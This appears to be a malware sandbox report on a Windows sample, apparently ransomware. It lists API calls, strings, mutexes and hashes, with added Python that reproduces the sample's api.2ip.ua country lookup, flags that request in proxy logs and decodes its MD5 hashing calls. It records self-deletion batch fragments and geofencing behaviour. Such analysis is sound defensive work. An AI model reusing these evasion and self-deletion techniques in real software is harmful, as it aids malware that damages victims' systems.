                                                                                      • API String ID: 1485416377-2962370585
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%
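The routine at 0040CF10 above is the sample's geolocation check: it opens WinINet with the user agent string "Microsoft Internet Explorer", fetches https://api.2ip.ua/geo.json, reads up to 0x2800 bytes, and then searches the body for the literal "country_code":" instead of parsing the JSON. The Python below is an added example, not from the report or the sample, that reproduces that extraction on constructed response bodies, contrasts it with a real JSON parse (a nested object containing the same key makes the two disagree), and flags the same request in constructed proxy log records. EXCLUDED_COUNTRIES, the proxy log format and the response bodies are assumptions made for the example; the listing shows only the lookup, not what the sample does with the result or how it handles a failed download.

```python
import json
import re

NEEDLE = b'"country_code":"'   # literal the routine searches for in the response body
READ_LIMIT = 0x2800            # InternetReadFile buffer size in the listing (10240 bytes)

# Placeholder: the listing shows the lookup, not the list the result is compared with.
EXCLUDED_COUNTRIES = frozenset({"XX", "YY"})


def country_code_like_sample(body):
    """Reproduce the routine's extraction: substring search over the first READ_LIMIT
    bytes, no JSON parsing, value runs to the next double quote."""
    chunk = body[:READ_LIMIT]
    i = chunk.find(NEEDLE)
    if i < 0:
        return None
    start = i + len(NEEDLE)
    end = chunk.find(b'"', start)
    return None if end < 0 else chunk[start:end].decode("ascii", "replace")


def country_code_parsed(body):
    """Real JSON parse of the top-level key, for comparison with the substring trick."""
    try:
        return json.loads(body.decode("utf-8"))["country_code"]
    except (ValueError, KeyError, TypeError):
        return None


def geofence_says_skip(body):
    """Decision as the sample would make it with the placeholder list. A body that
    yields no code (HTTP error page, empty reply) is treated as 'not excluded' here;
    the listing does not show how the sample handles that case."""
    code = country_code_like_sample(body)
    return code is not None and code in EXCLUDED_COUNTRIES


# Constructed response bodies; not captured from api.2ip.ua.
RESPONSES = {
    "excluded":     b'{"ip":"203.0.113.9","country_code":"XX","country":"Example"}',
    "allowed":      b'{"ip":"203.0.113.9","country_code":"DE","country":"Germany"}',
    "html_error":   b'<html><body>503 Service Unavailable</body></html>',
    # Nested object first: the substring search picks "YY", a JSON parse gives "DE".
    "nested_first": b'{"asn":{"country_code":"YY"},"country_code":"DE"}',
}

# Constructed proxy records: <ts> <src> <method> <url> <status> "<user-agent>".
# A CONNECT line is what a non-intercepting proxy logs for the TLS session.
PROXY_LINES = [
    '2021-09-30T12:00:01Z 10.0.0.15 GET https://api.2ip.ua/geo.json 200 "Microsoft Internet Explorer"',
    '2021-09-30T12:00:02Z 10.0.0.22 CONNECT api.2ip.ua:443 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/92.0"',
    '2021-09-30T12:00:03Z 10.0.0.15 GET https://www.example.com/ 200 "Microsoft Internet Explorer"',
]
_PROXY = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
                    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')
_HOST = re.compile(r'^(?:[a-z]+://)?([^/:]+)')


def flag_geo_lookups(lines):
    """(source, confidence) for each lookup of the geolocation service. The host alone
    is 'medium' because legitimate software queries the same API; the sample's exact
    WinINet user agent string raises it to 'high'."""
    hits = []
    for line in lines:
        m = _PROXY.match(line)
        if not m:
            continue
        h = _HOST.match(m.group("url"))
        if not h or h.group(1) != "api.2ip.ua":
            continue
        level = "high" if m.group("ua") == "Microsoft Internet Explorer" else "medium"
        hits.append((m.group("src"), level))
    return hits


if __name__ == "__main__":
    for name, body in RESPONSES.items():
        print(name, country_code_like_sample(body), country_code_parsed(body), geofence_says_skip(body))
    print(flag_geo_lookups(PROXY_LINES))
```

The user agent string on its own is a weak indicator, which is why the third constructed record (same user agent, unrelated host) is not flagged; the combination of host and user agent is what singles out this sample's request.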

                                                                                      APIs
                                                                                      • _doexit.LIBCMT ref: 00427F47
                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                      • String ID:
                                                                                      • API String ID: 2158581194-0
                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                      • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                      • _memset.LIBCMT ref: 004110CA
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                      • _malloc.LIBCMT ref: 00411100
                                                                                      • _memset.LIBCMT ref: 0041110B
                                                                                      • _sprintf.LIBCMT ref: 0041112E
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 2451520719-213608013
                                                                                      • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                      • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                      • _memset.LIBCMT ref: 0040E98E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                      • _sprintf.LIBCMT ref: 0040E9D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1084002244-213608013
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                      • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                      • _memset.LIBCMT ref: 0040EBB4
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                      • _sprintf.LIBCMT ref: 0040EBF4
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1637485200-213608013
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%
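The three non-executed routines above (at 00411010, 0040E8CE and 0040EB01) are variants of one CryptoAPI helper: CryptAcquireContextW with provider type 1 (PROV_RSA_FULL) and flags F0000000 (CRYPT_VERIFYCONTEXT, so no persistent key container is opened), CryptCreateHash with ALG_ID 00008003 (CALG_MD5), CryptGetHashParam with 00000002 (HP_HASHVAL), and each digest byte printed with "%.2X", i.e. an uppercase MD5 hex string. The Python below is an added example, not from the report or the sample: a decoder that splits any ALG_ID into its class/type/sub-id bit fields so other values in a report can be read the same way, a parser for the report's own CryptCreateHash lines, and a reproduction of the routine's output. REPORT_LINE is copied from the listing above; the name tables cover only the common wincrypt.h identifiers.

```python
import hashlib
import re

# Bit layout of a CryptoAPI ALG_ID (wincrypt.h): class (3 bits) | type (4 bits) | sub-id (9 bits).
ALG_CLASSES = {1: "SIGNATURE", 2: "MSG_ENCRYPT", 3: "DATA_ENCRYPT", 4: "HASH", 5: "KEY_EXCHANGE"}
ALG_TYPES = {0: "ANY", 1: "DSS", 2: "RSA", 3: "BLOCK", 4: "STREAM", 5: "DH", 6: "SECURECHANNEL"}
# Sub-id meaning depends on the class (and, for ciphers, on the type); common values only.
HASH_SIDS = {1: "MD2", 2: "MD4", 3: "MD5", 4: "SHA1", 9: "HMAC", 12: "SHA_256", 13: "SHA_384", 14: "SHA_512"}
CIPHER_SIDS = {("BLOCK", 1): "DES", ("BLOCK", 2): "RC2", ("BLOCK", 3): "3DES",
               ("BLOCK", 14): "AES_128", ("BLOCK", 15): "AES_192", ("BLOCK", 16): "AES_256",
               ("STREAM", 1): "RC4"}


def decode_alg_id(alg_id):
    """Split an ALG_ID into its fields and name it where the tables allow."""
    cls_bits = (alg_id >> 13) & 0x7
    typ_bits = (alg_id >> 9) & 0xF
    cls = ALG_CLASSES.get(cls_bits, "class_%d" % cls_bits)
    typ = ALG_TYPES.get(typ_bits, "type_%d" % typ_bits)
    sid = alg_id & 0x1FF
    name = None
    if cls == "HASH":
        name = HASH_SIDS.get(sid)
    elif cls == "DATA_ENCRYPT":
        name = CIPHER_SIDS.get((typ, sid))
    elif cls in ("KEY_EXCHANGE", "SIGNATURE") and typ == "RSA" and sid == 0:
        name = "RSA_KEYX" if cls == "KEY_EXCHANGE" else "RSA_SIGN"
    return {"class": cls, "type": typ, "sid": sid, "name": name}


# The ALG_ID is the second argument of CryptCreateHash as printed in the report.
_CREATE_HASH = re.compile(r"CryptCreateHash\.ADVAPI32\(([0-9A-Fa-f]{8}),([0-9A-Fa-f]{8})")


def alg_id_from_report_line(line):
    """Return the ALG_ID from a report line of the form shown above, or None."""
    m = _CREATE_HASH.search(line)
    return int(m.group(2), 16) if m else None


def md5_hex_upper(data):
    """Same output as the listed routine: CALG_MD5 digest fetched with HP_HASHVAL,
    each byte formatted with "%.2X" and concatenated."""
    return "".join("%.2X" % b for b in hashlib.md5(data).digest())


# Copied from the listing above.
REPORT_LINE = "CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B"


if __name__ == "__main__":
    alg = alg_id_from_report_line(REPORT_LINE)
    print(hex(alg), decode_alg_id(alg))
    print(md5_hex_upper(b"abc"))
```

Because the provider is opened with CRYPT_VERIFYCONTEXT and only hashing is performed, these routines do not touch any key material; the MD5 output is a fingerprint string, not part of the file encryption.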

                                                                                      APIs
                                                                                        • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                        • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                        • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                        • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                        • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                        • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                        • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                        • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                      • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                      • SelectObject.GDI32(?,?), ref: 00482436
                                                                                      • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                      • DeleteDC.GDI32(?), ref: 0048244A
                                                                                      • DeleteDC.GDI32(?), ref: 00482450
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                      • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                      • API String ID: 151064509-1805842116
                                                                                      • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                      • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                      • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                      • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0040E67F
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _malloc.LIBCMT ref: 0040E68B
                                                                                      • _wprintf.LIBCMT ref: 0040E69E
                                                                                      • _free.LIBCMT ref: 0040E6A4
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                      • _free.LIBCMT ref: 0040E6C5
                                                                                      • _malloc.LIBCMT ref: 0040E6CD
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                      • _sprintf.LIBCMT ref: 0040E720
                                                                                      • _wprintf.LIBCMT ref: 0040E732
                                                                                      • _wprintf.LIBCMT ref: 0040E73C
                                                                                      • _free.LIBCMT ref: 0040E745
                                                                                      Strings
                                                                                      • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                      • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                      • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                      • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                      • API String ID: 3901070236-1604013687
                                                                                      • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                      • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 2299586839-711371036
                                                                                      • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                      • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

                                                                                      Strings
                                                                                      • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                      • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: __wassert
                                                                                      • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                      • API String ID: 3993402318-1975116136
                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • Opcode ID: 0981c63a9f74f2cef49bc96d02ddff45abf4a099554e5cdf54aba45a1097e0a9
                                                                                      • Instruction ID: 4e82b3bf9c856ad283c1aa7fcc5662c157764fb6338ab4a3d9b9e059fef01284
                                                                                      • Opcode Fuzzy Hash: 0981c63a9f74f2cef49bc96d02ddff45abf4a099554e5cdf54aba45a1097e0a9
                                                                                      • Instruction Fuzzy Hash: D2C09B315002004FD735CA24DD613A273B277AB301F1588A5D1175B054D73A9015C506

                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                      • GetLastError.KERNEL32 ref: 00412509
                                                                                      • CloseHandle.KERNEL32 ref: 0041251C
                                                                                      • CloseHandle.KERNEL32 ref: 00412539
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                      • GetLastError.KERNEL32 ref: 0041255B
                                                                                      • CloseHandle.KERNEL32 ref: 0041256E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: CloseHandle$CreateErrorLastMutex
                                                                                      • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                      • API String ID: 2372642624-488272950
                                                                                      • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                      • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                      • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                      • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      • API ID: _strncmp
                                                                                      • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                      • API String ID: 909875538-2733969777
                                                                                      • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                      • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                      • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                      • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                      • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                      • GetDesktopWindow.USER32 ref: 004549FB
                                                                                      • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                      • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
